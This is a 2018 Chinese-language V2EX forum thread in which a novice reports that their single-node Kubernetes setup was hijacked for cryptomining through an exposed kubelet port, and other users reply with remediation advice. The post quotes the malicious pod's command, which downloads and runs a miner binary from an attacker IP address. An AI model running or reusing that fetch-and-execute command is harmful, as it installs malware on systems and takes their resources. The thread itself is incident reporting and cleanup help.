Home Sign Up Sign In
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
Sign Up Now
For Existing Member  Sign In
shisang
V2EX  ›  问与答

k8s 被人拿去挖矿了

  •   
  •   shisang · Aug 2, 2018 · 7132 views
    This topic created in 2825 days ago, the information mentioned may be changed or developed.

    在腾讯云学生机上自己折腾 k8s,并把 blog 部署在上边,结果两天上去怎么多那么多 pod。

    top

    kubectl get pods

    ps aux | grep k.conf

    查看 /tmp/docker, 没有了估计是屁股被擦干净了。

    订阅轻重一个 pod

    Command:
      sh
      -c
      curl -o /var/tmp/config.json http://192.99.142.232:8220/2.json;curl -o /var/tmp/suppoie http://192.99.142.232:8220/rig;chmod 777 /var/tmp/suppoie;cd /var/tmp;./suppoie -c config.json

    找到了一篇一样遭遇的文章http://www.lijiaocn.com/%E9%97%AE%E9%A2%98/2018/07/20/kubernetes-docker-cpu-high.html 按照作者所说应该是 10250 端口暴露到外网了。

    netstat -lnpt | grep 10250 果不其然。

    先杀死挖矿 pods,

    kubectl get pods | grep y1ee4 | awk '{print $1}' | xargs kubectl delete --grace-period=0 --force pods

    kubectl get pods

    有重新创建了,日了

    kubectl get rc 然后 delete rc,赶紧查看是不是哪里配置写错了。

    新手,大神路过指导一二。

  • kubectl
  • pods
  • grep
  • get
    24 replies    2019-06-28 00:39:42 +08:00
    shisang
        1
    shisang  
    OP
       Aug 2, 2018
    消灭零回复
    des
        2
    des  
       Aug 2, 2018 via Android
    重装最简单了
    shisang
        3
    shisang  
    OP
       Aug 2, 2018
    @des 要不要那么暴力
    wtks1
        4
    wtks1  
       Aug 2, 2018 via Android
    重装是最暴力但最有效的办法
    murmur
        5
    murmur  
       Aug 2, 2018
    @shisang linux 没杀软 没那么多 windows 的花式检查工具 真的只能重装
    murmur
        6
    murmur  
       Aug 2, 2018
    别人甚至还可以替换掉你的常用命令
    artandlol
        7
    artandlol  
       Aug 2, 2018 via iPhone
    @wtks1 只要不是用 root 用户登 docker 就没必要重装
    artandlol
        8
    artandlol  
       Aug 2, 2018 via iPhone
    启 rbacc 客户端启用 token docker 用户不应该是 root
    qfdk
        9
    qfdk  
    PRO
       Aug 2, 2018 via iPhone
    docker 开了 remote api 了吧 我也中了 都是 docker 中运行 然后从容器里跑出来的 最后让我消灭了…… 本来是开了 api 做测试的 两天就被挖坑了
    artandlol
        10
    artandlol  
       Aug 2, 2018 via iPhone
    然后 kubectl -o 出 yamll 然后 delete 看你是用 root 跑,最好还是回滚到之前的
    abmin521
        11
    abmin521  
       Aug 2, 2018 via Android
    刚好研究过
    关闭 kubelet 的匿名访问 双向 tls 就行了
    kubeadm 就没有这个 bug
    有空准备扫一波
    cqxxxxxxx
        12
    cqxxxxxxx  
       Aug 2, 2018
    lz 是一台机器 minikube 搭的 k8s?还是好几台机器搭的集群?
    DesignerSkyline
        13
    DesignerSkyline  
       Aug 2, 2018
    重装吧,二进制已经被污染了
    shisang
        14
    shisang  
    OP
       Aug 2, 2018
    @abmin521 之前在 vultr 是 kubeadm 装过,运行挺好,就是国内装不上,用 privoxy 代理也不行。但是 vultr 坑爹了,重启后 ip ping 不通,要手动修改网络配置。要手动在网页 console 输入密码十几次每一次对的,最后客服说可以通过 sysroot 修改密码,按照文档操作后直接 unknown user,弃坑~!
    shisang
        15
    shisang  
    OP
       Aug 2, 2018
    @cqxxxxxxx 1cpu 2G memory 的鹅厂学生机,源码安装的单节点~~~~~逃
    shisang
        16
    shisang  
    OP
       Aug 2, 2018
    @qfdk 没有该 docker,是 k8s 污染进来的
    mritd
        17
    mritd  
       Aug 3, 2018
    你多半是看了那个 无良教程 apiserver 监听 :8080 了吧
    E1n
        18
    E1n  
       Aug 3, 2018 via Android
    单机能学到什么东西,褥 gcp 玩玩集群吧
    580a388da131
        19
    580a388da131  
       Aug 3, 2018 via Android
    不是有安全组吗?你开了所有端口?
    1daydayde
        20
    1daydayde  
       Aug 3, 2018 via iPhone
    直接删 pod 要是能删掉的话 deployment、rc、daemonset 是干嘛的😷
    znood
        21
    znood  
       Aug 3, 2018 via iPhone
    查看 k8s 所有资源,把可疑的删掉,只删 pod 没用的,kubelet 会自动创建
    shisang
        22
    shisang  
    OP
       Aug 3, 2018
    @580a388da131 为了方便测试,安全之前设置为 all,所有端口放行了~~
    shisang
        23
    shisang  
    OP
       Aug 3, 2018
    @E1n 现在下岗,没钱~!
    suom
        24
    suom  
       Jun 28, 2019
    装好机器以后,整个机器备份一次。
    被黑了,直接查洞-还原备份-修补漏洞-再次备份-部署业务
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   3695 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 86ms · UTC 05:00 · PVG 13:00 · LAX 22:00 · JFK 01:00
    ♥ Do have faith in what you're doing.